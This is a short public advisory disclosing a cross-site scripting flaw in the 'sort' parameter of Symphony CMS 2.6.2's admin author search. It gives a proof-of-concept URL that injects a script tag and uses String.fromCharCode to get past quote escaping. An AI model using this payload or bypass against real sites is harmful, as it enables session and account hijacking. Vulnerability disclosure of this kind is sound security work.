Symphony CMS 2.6.2 Cross Site Scripting

`[+] Credits: John Page ( hyp3rlinx )  
  
[+] Domains: hyp3rlinx.altervista.org  
  
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SYMPHONY0606.txt  
  
  
  
Vendor:  
================================  
www.getsymphony.com/download/  
  
  
Product:  
================================  
Symphony CMS 2.6.2  
  
  
Advisory Information:  
================================================  
Symphony CMS XSS Vulnerability  
  
  
  
Vulnerability Details:  
=====================  
The 'sort' parameter used by author search in Admin is XSS exploitable.  
Symphony seems to escape injected strings e.g. 'HELL' becomes \'HELL\' but  
we can easily defeat that using Javascript functions charCodeAt() &  
fromCharCode()  
  
e.g.  
String.fromCharCode(72,69,76,76)  
  
Now we can output our 'HELL' strings, construct URLs etc...  
  
  
Exploit XSS code(s):  
====================  
  
http://localhost/symphony-2.6.2/symphony/system/authors/?sort=  
</h1><script>alert(String.fromCharCode(72,69,76,76))</script><h1>&order=asc  
  
  
Disclosure Timeline:  
=========================================================  
  
  
Vendor Notification: June 5, 2015  
June 6, : Public Disclosure  
  
  
  
Severity Level:  
=========================================================  
Med  
  
  
  
Description:  
==========================================================  
  
Request Method(s):  
[+] GET  
  
Vulnerable Product:  
[+] Symphony CMS 2.6.2  
  
Vulnerable Parameter(s):  
[+] sort  
  
Affected Area(s):  
[+] symphony/system/authors/  
  
===============================================================  
  
(hyp3rlinx)  
`